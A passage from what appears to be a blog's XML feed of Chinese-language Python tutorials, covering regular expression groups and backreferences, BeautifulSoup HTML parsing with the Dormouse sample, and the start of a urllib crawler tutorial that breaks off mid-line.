[&#39;Chapter99&#39;]re.findall(r&#39;\bCha&#39;, &#39; Chapter&#39;)# result: [&#39;Cha&#39;]re.findall(r&#39;ter\b&#39;, &#39; Chapter&#39;)# result: [&#39;ter&#39;]re.findall(r&#39;\Bapt&#39;, &#39;Chapter&#39;)# result: [&#39;apt&#39;]re.findall(r&#39;\Bapt&#39;, &#39;aptitude&#39;)# result: []</code></pre><h2 id="分组与捕获组"><a href="#分组与捕获组" class="headerlink" title="分组与捕获组"></a>分组与捕获组</h2><p>要说明白捕获，就要先从分组开始。重复单字符我们可以使用限定符，如果重复字符串，用什么呢？ 对！用小括号，小括号里包裹指定字表达式（子串），这就是分组。之后就可以限定这个子表示的重复次数了。</p><p>那么，什么是捕获呢？使用小括号指定一个子表达式后，匹配这个子表达式的文本（即匹配的内容）可以在表达式或者其他过程中接着用，怎么用呢？至少应该有个指针啥的引用它吧？ 对！默认情况下，每个分组（小括号）会自动拥有一个组号,从左到右，以分组的左括号为标志，第一个出现的分组组号为1，后续递增。如果出现嵌套，</p><pre><code>s = &#39;aaa111aaa , bbb222 , 333ccc&#39;re.findall(r&#39;[a-z]+(\d+)[a-z]&#39;, s)# result:[&#39;111&#39;]re.findall(r&#39;[a-z]+\d+[a-z]&#39;, s)  # 对比(\d+)的用法# result:[&#39;aaa111a&#39;]re.findall(r&#39;[a-z]+\d+[a-z]+&#39;, s)  # 对比(\d+)的用法# result:[&#39;aaa111aaa&#39;]s = &#39;111aaa222aaa111 , 333bbb444bb33&#39;re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, s)# result:[(&#39;111&#39;, &#39;aaa&#39;, &#39;222&#39;, &#39;aaa&#39;, &#39;111&#39;)]re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, &#39;333bbb444bb33&#39;)# result:[]re.findall(r&#39;(\d+)([a-z]+)(\d+)(\2)(\1)&#39;, &#39;333bbb444bbb333&#39;)# result:[(&#39;333&#39;, &#39;bbb&#39;, &#39;444&#39;, &#39;bbb&#39;, &#39;333&#39;)]re.findall(r&#39;(\d+)([a-z]+)(\d+)(\1)(\2)&#39;, &#39;333bbb444bbb333&#39;)# result:[]</code></pre><h2 id="非捕获组"><a href="#非捕获组" class="headerlink" title="非捕获组"></a>非捕获组</h2><p>用圆括号将所有选择项括起来，相邻的选择项之间用|分隔。但用圆括号会有一个副作用，使相关的匹配会被缓存。可用?:放在第一个选项前来消除这种副作用。</p><p>其中 ?: 是非捕获元之一，还有两个非捕获元是 ?= 和 ?!，这两个还有更多的含义，前者为正向预查，在任何开始匹配圆括号内的正则表达式模式的位置来匹配搜索字符串，后者为负向预查，在任何开始不匹配该正则表达式模式的位置来匹配搜索字符串。</p><pre><code># (?:pattern)与(pattern)不同之处只是在于不捕获结果，非捕获组只匹配结果，但不捕获结果，也不会分配组号s = &#39;industry is industries lala industyyy industiii&#39;re.findall(r&#39;industr(?:y|ies)&#39;, s)# result: [&#39;industry&#39;, &#39;industries&#39;]s = &#39;Windows2000 Windows3.1&#39;re.findall(r&#39;Windows(?=95|98|NT|2000)&#39;, s)# result: [&#39;Windows&#39;]# 匹配 &quot;Windows2000&quot; 中的 &quot;Windows&quot;,不匹配 &quot;Windows3.1&quot; 中的 &quot;Windows&quot;。s = &#39;Windows2000 Windows3.1&#39;re.findall(r&#39;Windows(?!95|98|NT|2000)&#39;, s)# result: [&#39;Windows&#39;]# 匹配 &quot;Windows3.1&quot; 中的 &quot;Windows&quot;,不匹配 &quot;Windows2000&quot; 中的 &quot;Windows&quot;。s = &#39;aaa111aaa,bbb222,333ccc,444ddd444,555eee666,fff777ggg&#39;re.findall(r&#39;([a-z]+)\d+([a-z]+)&#39;, s)# result:[(&#39;aaa&#39;, &#39;aaa&#39;), (&#39;fff&#39;, &#39;ggg&#39;)]re.findall(r&#39;(?P&lt;g1&gt;[a-z]+)\d+(?P=g1)&#39;, s)# result:[&#39;aaa&#39;]re.findall(r&#39;(?P&lt;g1&gt;[a-z]+)\d+(?P=g1)&#39;, &#39;aaa111aaa,bbb222,333ccc,444ddd444,555eee666,fff777fff&#39;)# result:[&#39;aaa&#39;, &#39;fff&#39;]re.findall(r&#39;[a-z]+(\d+)([a-z]+)&#39;, s)# result: [(&#39;111&#39;, &#39;aaa&#39;), (&#39;777&#39;, &#39;ggg&#39;)]re.findall(r&#39;([a-z]+)\d+&#39;, s)# result:[&#39;aaa&#39;, &#39;bbb&#39;, &#39;ddd&#39;, &#39;eee&#39;, &#39;fff&#39;]re.findall(r&#39;([a-z]+)\d+\1&#39;, s)# result:[&#39;aaa&#39;]s = &#39;I have a dog , I have a cat&#39;re.findall(r&#39;I have a (?:dog|cat)&#39;, s)# result: [&#39;I have a dog&#39;, &#39;I have a cat&#39;]re.findall(r&#39;I have a dog|cat&#39;, s)# result: [&#39;I have a dog&#39;, &#39;cat&#39;]s = &#39;ababab abbabb aabaab abbbbbab&#39;re.findall(r&#39;\b(?:ab)+\b&#39;, s)# result: [&#39;ababab&#39;]re.findall(r&#39;\b(ab)+\b&#39;, s)# result: [&#39;ab&#39;]</code></pre><h2 id="反向引用"><a href="#反向引用" class="headerlink" title="反向引用"></a>反向引用</h2><p>捕获组(Expression)在匹配成功时，会将子表达式匹配到的内容，保存到内存中一个以数字编号的组里，可以简单的认为是对一个局部变量进行了赋值，这时就可以通过反向引用方式，引用这个局部变量的值。一个捕获组(Expression)在匹配成功之前，它的内容可以是不确定的，一旦匹配成功，它的内容就确定了，反向引用的内容也就是确定的了。</p><p>反向引用必然要与捕获组一同使用的，如果没有捕获组，而使用了反向引用的语法，不同语言的处理方式不一致，有的语言会抛异常，有的语言会当作普通的转义处理。</p><pre><code>s = &#39;Is is the cost of of gasoline going up up ?&#39;re.findall(r&#39;\b([a-z]+) \1\b&#39;, s, re.I)  # 大小写不敏感# result: [&#39;Is&#39;, &#39;of&#39;, &#39;up&#39;]re.findall(r&#39;\b([a-z]+) \1\b&#39;, s)# result: [&#39;of&#39;, &#39;up&#39;]s = &#39;http://www.w3cschool.cc:80/html/html-tutorial.html&#39;re.findall(r&#39;(\w+):\/\/([^/:]+)(:\d*)?([^# ]*)&#39;, s)# result: [(&#39;http&#39;, &#39;www.w3cschool.cc&#39;, &#39;:80&#39;, &#39;/html/html-tutorial.html&#39;)]</code></pre><h2 id="注意区别：pattern-、pattern-、-pattern-、-pattern"><a href="#注意区别：pattern-、pattern-、-pattern-、-pattern" class="headerlink" title="注意区别：pattern+?、pattern*?、(?!pattern)、(?:pattern)"></a>注意区别：pattern+?、pattern*?、(?!pattern)、(?:pattern)</h2><h4 id="pattern-、pattern"><a href="#pattern-、pattern" class="headerlink" title="pattern+?、pattern*?"></a>pattern+?、pattern*?</h4><p>这两个比较常用，表示懒惰匹配，即匹配符合条件的尽量短的字符串。默认情况下 + 和 * 是贪婪匹配，即匹配尽可能长的字符串，在它们后面加上 ? 表示想要进行懒惰匹配。</p><h4 id="pattern"><a href="#pattern" class="headerlink" title="(?!pattern)"></a>(?!pattern)</h4><p>表示一个过滤条件，若字符串符合 pattern 则将其过滤掉。在分析日志时很有用，例如想过滤掉包含 info 标记的日志可以写 ^(?!.<em>info).</em>$。</p><h4 id="pattern-1"><a href="#pattern-1" class="headerlink" title="(?:pattern)"></a>(?:pattern)</h4><p>这条规则主要是为了优化性能，对匹配没有影响。它表示括号内的子表达式匹配的结果不需要返回也不会被 <img src="https://math.jianshu.com/math?formula=1" alt="1">2 之类的反向引用。</p><h2 id="模式匹配"><a href="#模式匹配" class="headerlink" title="模式匹配"></a>模式匹配</h2><ol><li>import re导入正则表达式模块。Python中所有正则表达式的函数都在re模块中，所以我们要先引入re模块；</li><li>用re.compile()函数创建一个Regex对象（参数就是要匹配的内容的正则表达式）；</li><li>用Regex对象的search()方法来查找一段字符串，返回那个匹配的对象num，num中是一段相应的描述信息；</li><li>调用匹配对象num的group()方法，返回实际匹配文本的字符串。</li></ol><pre><code>import res1 = &quot;once upon a time&quot;s2 = &quot;There once was a man from NewYork&quot;print(re.findall(r&#39;^once&#39;, s1))# result: [&#39;once&#39;]print(re.findall(r&#39;^once&#39;, s2))# result: []print(re.findall(r&#39;time$&#39;, s1))# result: [&#39;time&#39;]print(re.findall(r&#39;times$&#39;, s1))# result: []print(re.findall(r&#39;^time$&#39;, s1))# result: []print(re.findall(r&#39;^time$&#39;, &#39;time&#39;))# result: [&#39;time&#39;]## compiles = &#39;111,222,aaa,bbb,ccc333,444ddd&#39;rule = r&#39;\b\d+\b&#39;compiled_rule = re.compile(rule)print(compiled_rule.findall(s))# result: [&#39;111&#39;, &#39;222&#39;]## matchprint(re.match(&#39;www&#39;, &#39;www.runoob.com&#39;).span())  # 在起始位置匹配# result: (0, 3)print(re.match(&#39;com&#39;, &#39;www.runoob.com&#39;))  # 不在起始位置匹配# result: Noneline = &quot;Cats are smarter than dogs&quot;matchObj = re.match(r&#39;(.*) are (.*?) .*&#39;, line, re.M | re.I)if matchObj:    print(&quot;matchObj.group() : &quot;, matchObj.group())    # result: matchObj.group() :  Cats are smarter than dogs    print(&quot;matchObj.group(1) : &quot;, matchObj.group(1))    # result: matchObj.group(1) :  Cats    print(&quot;matchObj.group(2) : &quot;, matchObj.group(2))    # result: matchObj.group(2) :  smarterelse:    print(&quot;No match!!&quot;)## searchprint(re.search(&#39;www&#39;, &#39;www.runoob.com&#39;).span())  # 在起始位置匹配# result: (0, 3)print(re.search(&#39;com&#39;, &#39;www.runoob.com&#39;).span())  # 不在起始位置匹配# result: (11, 14)line = &quot;Cats are smarter than dogs&quot;;searchObj = re.search(r&#39;(.*) are (.*?) .*&#39;, line, re.M | re.I)if searchObj:    print(&quot;searchObj.group() : &quot;, searchObj.group())    # result: searchObj.group() :  Cats are smarter than dogs    print(&quot;searchObj.group(1) : &quot;, searchObj.group(1))    # result: searchObj.group(1) :  Cats    print(&quot;searchObj.group(2) : &quot;, searchObj.group(2))    # result: searchObj.group(2) :  smarterelse:    print(&quot;Nothing found!!&quot;)## match与searchline = &quot;Cats are smarter than dogs&quot;matchObj = re.match(r&#39;dogs&#39;, line, re.M | re.I)if matchObj:    print(&quot;match --&gt; matchObj.group() : &quot;, matchObj.group())else:    print(&quot;No match!!&quot;)    # result: No match!!matchObj = re.search(r&#39;dogs&#39;, line, re.M | re.I)if matchObj:    print(&quot;search --&gt; matchObj.group() : &quot;, matchObj.group())    # result: search --&gt; matchObj.group() :  dogselse:    print(&quot;No match!!&quot;)## subphone = &quot;2004-959-559 # This is Phone Number&quot;num = re.sub(r&#39;#.*$&#39;, &quot;&quot;, phone)print(&quot;Phone Num : &quot;, num)# result: Phone Num :  2004-959-559num = re.sub(r&#39;\D&#39;, &quot;&quot;, phone)print(&quot;Phone Num : &quot;, num)# result: Phone Num :  2004959559</code></pre><h2 id="正则表达式与BeautifulSoup"><a href="#正则表达式与BeautifulSoup" class="headerlink" title="正则表达式与BeautifulSoup"></a>正则表达式与BeautifulSoup</h2><pre><code>from urllib.request import urlopenfrom bs4 import BeautifulSoupimport rehtml = urlopen(&quot;http://www.pythonscraping.com/pages/page3.html&quot;)bsObj = BeautifulSoup(html, &#39;lxml&#39;)# print(bsObj.prettify())images = bsObj.findAll(&quot;img&quot;, {&quot;src&quot;: re.compile(&quot;\.\.\/img\/gifts/img.*\.jpg&quot;)})for image in images:    print(image[&quot;src&quot;])# result: ../img/gifts/img1.jpg# ../img/gifts/img2.jpg# ../img/gifts/img3.jpg# ../img/gifts/img4.jpg# ../img/gifts/img6.jpg</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> regex </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之四：BeautifulSoup</title>
      <link href="/Coderzgh.github.io/2019/05/14/python-crawler-beautifulsoup-4/"/>
      <url>/Coderzgh.github.io/2019/05/14/python-crawler-beautifulsoup-4/</url>
      
        <content type="html"><![CDATA[<h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>正文：</h2><p>Beautiful Soup 是一个可以从HTML或XML文件中提取数据的Python库.它能够通过你喜欢的转换器实现惯用的文档导航,查找,修改文档的方式.Beautiful Soup会帮你节省数小时甚至数天的工作时间.</p><p>安装: pip install beautifulsoup4</p><blockquote><p>名字是beautifulsoup 的包,是 Beautiful Soup3 的发布版本,因为很多项目还在使用BS3, 所以 beautifulsoup 包依然有效.但是如果你在编写新项目,那么你应该安装的 beautifulsoup4，这个包兼容Python2和Python3</p></blockquote><h2 id="BeautifulSoup的基础使用"><a href="#BeautifulSoup的基础使用" class="headerlink" title="BeautifulSoup的基础使用"></a>BeautifulSoup的基础使用</h2><p>下面的一段HTML代码将作为例子被多次用到.这是《爱丽丝梦游仙境》的的一段内容(以后简称文档)</p><pre><code>html_doc = &quot;&quot;&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were&lt;a href=&quot;http://example.com/elsie&quot; class=&quot;sister&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,&lt;a href=&quot;http://example.com/lacie&quot; class=&quot;sister&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and&lt;a href=&quot;http://example.com/tillie&quot; class=&quot;sister&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;and they lived at the bottom of a well.&lt;/p&gt;&lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;&quot;&quot;&quot;</code></pre><p>使用BeautifulSoup解析这段代码,能够得到一个 BeautifulSoup 的对象,并能按照标准的缩进格式的结构输出</p><pre><code>from bs4 import BeautifulSoupsoup = BeautifulSoup(html_doc, &quot;lxml&quot;)print(soup.prettify())# result:# &lt;html&gt;#  &lt;head&gt;#   &lt;title&gt;#    The Dormouse&#39;s story#   &lt;/title&gt;#  &lt;/head&gt;#  &lt;body&gt;#   &lt;p class=&quot;title&quot;&gt;#    &lt;b&gt;#     The Dormouse&#39;s story#    &lt;/b&gt;#   &lt;/p&gt;#   &lt;p class=&quot;story&quot;&gt;#    Once upon a time there were three little sisters; and their names were#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;#     Elsie#    &lt;/a&gt;#    ,#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;#     Lacie#    &lt;/a&gt;#    and#    &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;#     Tillie#    &lt;/a&gt;#    ;# and they lived at the bottom of a well.#   &lt;/p&gt;#   &lt;p class=&quot;story&quot;&gt;#    ...#   &lt;/p&gt;#  &lt;/body&gt;# &lt;/html&gt;</code></pre><p>几个简单的浏览结构化数据的方法</p><pre><code>soup.title# result: &lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;soup.title.name# result: &#39;title&#39;soup.title.string# result: &#39;The Dormouse&#39;s story&#39;soup.title.text# result: &#39;The Dormouse&#39;s story&#39;soup.title.parent.name# result: &#39;head&#39;soup.p# result: &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;soup.p[&#39;class&#39;]# result: &#39;title&#39;soup.a# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;soup.find_all(&#39;a&#39;)#  result:# [&lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,#  &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;,#  &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;]soup.find(id=&quot;link3&quot;)# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;</code></pre><p>从文档中找到所有<a>标签的链接</a></p><pre><code>for link in soup.find_all(&#39;a&#39;):    print(link.get(&#39;href&#39;))# result:# http://example.com/elsie# http://example.com/lacie# http://example.com/tillie</code></pre><p>从文档中获取所有文字内容</p><pre><code>print(soup.get_text())# result:# The Dormouse&#39;s story## The Dormouse&#39;s story## Once upon a time there were three little sisters; and their names were# Elsie,# Lacie and# Tillie;# and they lived at the bottom of a well.## ...</code></pre><p>从文档中解析导航树</p><pre><code># 直接子节点print(soup.body.contents)for child in soup.descendants:    print(child)# 所有后代节点for child in soup.descendants:    print(child)# 节点内容1-包含换行符for string in soup.strings:    print(repr(string))# 节点内容2-不包含换行符for string in soup.stripped_strings:    print(repr(string))# 兄弟节点(没有一个兄弟节点会返回None)print(soup.p.next_sibling)print(soup.p.previous_sibling)for sibling in soup.a.next_siblings:    print(repr(sibling))# 前后节点print(soup.head.next_element)print(soup.head.previous_element)# 父节点from urllib.request import urlopenhtml = urlopen(&quot;http://www.pythonscraping.com/pages/page3.html&quot;)bsObj = BeautifulSoup(html)print(bsObj.find(&quot;img&quot;, {&quot;src&quot;: &quot;../img/gifts/img1.jpg&quot;}).parent.previous_sibling.get_text())</code></pre><p>从文档中解析CSS选择器</p><pre><code>print(soup.select(&#39;title&#39;))print(soup.select(&#39;a&#39;))print(soup.select(&#39;b&#39;))print(soup.select(&#39;.sisiter&#39;))print(soup.select(&#39;#link1&#39;))print(soup.select(&#39;p #link1&#39;))print(soup.select(&#39;head &gt; title&#39;))print(soup.select(&#39;a[class=&quot;sister&quot;]&#39;))print(soup.select(&#39;a[href=&quot;http://example.com/elsie&quot;]&#39;))print(soup.select(&#39;p a[href=&quot;http://example.com/elsie&quot;]&#39;))</code></pre><p>结合正则表达式或其他逻辑条件</p><pre><code>import refor tag in soup.find_all(href=re.compile(&quot;elsie&quot;)):    print(tag)# result: &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;for tag in soup.find_all(&quot;a&quot;, class_=&quot;sister&quot;):    print(tag)# result：# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;for tag in soup.find_all([&quot;a&quot;, &quot;b&quot;]):    print(tag)# result :# &lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;for tag in soup.find_all(True):    print(tag)# result:# &lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;# &lt;body&gt;# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;# and they lived at the bottom of a well.&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;# &lt;/body&gt;&lt;/html&gt;# &lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;# &lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;# &lt;body&gt;# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;# and they lived at the bottom of a well.&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;# &lt;/body&gt;# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;# &lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;# and they lived at the bottom of a well.&lt;/p&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt;# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;def has_class_but_no_id(tag):    return tag.has_attr(&#39;class&#39;) and not tag.has_attr(&#39;id&#39;)for tag in soup.find_all(has_class_but_no_id):    print(tag)# result:# &lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/elsie&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/lacie&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and# &lt;a class=&quot;sister&quot; href=&quot;http://example.com/tillie&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;# and they lived at the bottom of a well.&lt;/p&gt;# &lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;</code></pre><h2 id="BeautifulSoup的主要参数的使用"><a href="#BeautifulSoup的主要参数的使用" class="headerlink" title="BeautifulSoup的主要参数的使用"></a>BeautifulSoup的主要参数的使用</h2><pre><code>html_doc = &quot;&quot;&quot;&lt;html&gt;&lt;head&gt;&lt;title&gt;The Dormouse&#39;s story&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;p class=&quot;title&quot;&gt;&lt;b&gt;The Dormouse&#39;s story&lt;/b&gt;&lt;/p&gt;&lt;p class=&quot;story&quot;&gt;Once upon a time there were three little sisters; and their names were&lt;a href=&quot;http://example.com/elsie&quot; class=&quot;sister&quot; id=&quot;link1&quot;&gt;Elsie&lt;/a&gt;,&lt;a href=&quot;http://example.com/lacie&quot; class=&quot;sister&quot; id=&quot;link2&quot;&gt;Lacie&lt;/a&gt; and&lt;a href=&quot;http://example.com/tillie&quot; class=&quot;sister&quot; id=&quot;link3&quot;&gt;Tillie&lt;/a&gt;;and they lived at the bottom of a well.&lt;/p&gt;&lt;p class=&quot;story&quot;&gt;...&lt;/p&gt;&quot;&quot;&quot;import bs4from bs4 import BeautifulSoupsoup = BeautifulSoup(html_doc, &quot;lxml&quot;)# text参数soup.find_all(text=&quot;Elsie&quot;)soup.find_all(text=[&quot;Elsie&quot;, &quot;Lacie&quot;, &quot;Tillie&quot;])soup.find_all(text=re.compile(&quot;Dormouse&quot;))# limit参数soup.find_all(&quot;a&quot;, limit=2)# recursive参数soup.html.find_all(&quot;title&quot;)soup.html.find_all(&quot;title&quot;, recursive=False)# tag对象print(soup.title)print(soup.head)print(soup.a)print(soup.p)print(type(soup.a))print(soup.name)print(soup.head.name)print(soup.p.attrs)print(soup.p[&#39;class&#39;])print(soup.p.get(&#39;class&#39;))soup.p[&#39;class&#39;] = &quot;newclass&quot;print(soup.p)del soup.p[&#39;class&#39;]print(soup.p)# NavigableString对象print(soup.p.string)print(type(soup.p.string))# BeautifulSoup对象print(type(soup.name))print(soup.name)print(soup.attrs)# Comment对象print(soup.a)print(soup.a.string)print(type(soup.a.string))if type(soup.a.string) == bs4.element.Comment:    print(soup.a.string)</code></pre><h2 id="BeautifulSoup解析在线网页实例"><a href="#BeautifulSoup解析在线网页实例" class="headerlink" title="BeautifulSoup解析在线网页实例"></a>BeautifulSoup解析在线网页实例</h2><pre><code>from urllib.request import urlopenfrom bs4 import BeautifulSouphtml = urlopen(&#39;http://www.pythonscraping.com/exercises/exercise1.html&#39;)bsObj = BeautifulSoup(html.read(), &#39;lxml&#39;)print(bsObj.h1)# CSS属性from urllib.request import urlopenfrom bs4 import BeautifulSouphtml = urlopen(&#39;http://www.pythonscraping.com/pages/warandpeace.html&#39;)bsObj = BeautifulSoup(html, &#39;lxml&#39;)nameList = bsObj.findAll(&#39;span&#39;, {&#39;class&#39;: &#39;green&#39;})for name in nameList:    print(name.get_text())# find()和findall()from urllib.request import urlopenfrom bs4 import BeautifulSouphtml = urlopen(&#39;http://www.pythonscraping.com/pages/warandpeace.html&#39;)bsObj = BeautifulSoup(html)allText = bsObj.findAll(id=&#39;text&#39;)print(allText[0].get_text())</code></pre><p>更多使用方法参见<a href="https://www.crummy.com/software/BeautifulSoup/bs4/doc.zh/" target="_blank" rel="noopener">BeautifulSoup 中文文档</a></p>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> BeautifulSoup </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之三：基本工具库urllib和requests</title>
      <link href="/Coderzgh.github.io/2019/05/13/python-crawler-urllib-requests-3/"/>
      <url>/Coderzgh.github.io/2019/05/13/python-crawler-urllib-requests-3/</url>
      
        <content type="html"><![CDATA[<h1 id="Python网络爬虫实战之三：基本工具库urllib和requests"><a href="#Python网络爬虫实战之三：基本工具库urllib和requests" class="headerlink" title="Python网络爬虫实战之三：基本工具库urllib和requests"></a>Python网络爬虫实战之三：基本工具库urllib和requests</h1><h1 id="一、urllib"><a href="#一、urllib" class="headerlink" title="一、urllib"></a>一、urllib</h1><h3 id="urllib简介"><a href="#urllib简介" class="headerlink" title="urllib简介"></a>urllib简介</h3><p>urllib是Python中一个功能强大用于操作URL，并在爬虫时经常用到的一个基础库，无需额外安装，默认已经安装到python中。</p><h3 id="urllib在python2-x与python3-x中的区别"><a href="#urllib在python2-x与python3-x中的区别" class="headerlink" title="urllib在python2.x与python3.x中的区别"></a>urllib在python2.x与python3.x中的区别</h3><p>在python2.x中，urllib分为urllib和urllib2，在python3.x中合并为urllib。两者使用起来不太一样，注意转换。</p><table><thead><tr><th>Python2.x</th><th>Python3.x</th></tr></thead><tbody><tr><td>import urllib2</td><td>import urllib.request，urllib.error</td></tr><tr><td>import urllib</td><td>import urllib.request，urllib.error，urllib.parse</td></tr><tr><td>import urlparse</td><td>import urllib.parse</td></tr><tr><td>import urlopen</td><td>import urllib.request.urlopen</td></tr><tr><td>import urlencode</td><td>import urllib.parse.urlencode</td></tr><tr><td>import urllib.quote</td><td>import urllib.request.quote</td></tr><tr><td>cookielib.CookieJar</td><td>http.CookieJar</td></tr><tr><td>urllib2.Request</td><td>urllib.request.Request</td></tr></tbody></table><h3 id="urllib的四个子模块"><a href="#urllib的四个子模块" class="headerlink" title="urllib的四个子模块"></a>urllib的四个子模块</h3><p>Python3.6.0中urllib模块包括一下四个子模块，urllib模块是一个运用于URL的包（urllib is a package that collects several modules for working with URLs）</p><ul><li>urllib.request用于访问和读取URLS（urllib.request for opening and reading URLs），就像在浏览器里输入网址然后回车一样，只需要给这个库方法传入URL和其他参数就可以模拟实现这个过程。</li><li>urllib.error包括了所有urllib.request导致的异常（urllib.error containing the exceptions raised by urllib.request），我们可以捕捉这些异常，然后进行重试或者其他操作以确保程序不会意外终止。</li><li>urllib.parse用于解析URLS（urllib.parse for parsing URLs），提供了很多URL处理方法，比如拆分、解析、合并、编码。</li><li>urllib.robotparser用于解析robots.txt文件（urllib.robotparser for parsing robots.txt files），然后判断哪些网站可以爬，哪些网站不可以爬。</li></ul><h3 id="使用urllib打开网页"><a href="#使用urllib打开网页" class="headerlink" title="使用urllib打开网页"></a>使用urllib打开网页</h3><p>最基本的方法打开网页</p><pre><code># 最基本的方法打开网页from urllib.request import urlopenresponse = urlopen(&quot;http://www.baidu.com&quot;)print(type(response))print(response.status)print(response.getheaders())print(response.getheader(&#39;Server&#39;))html = 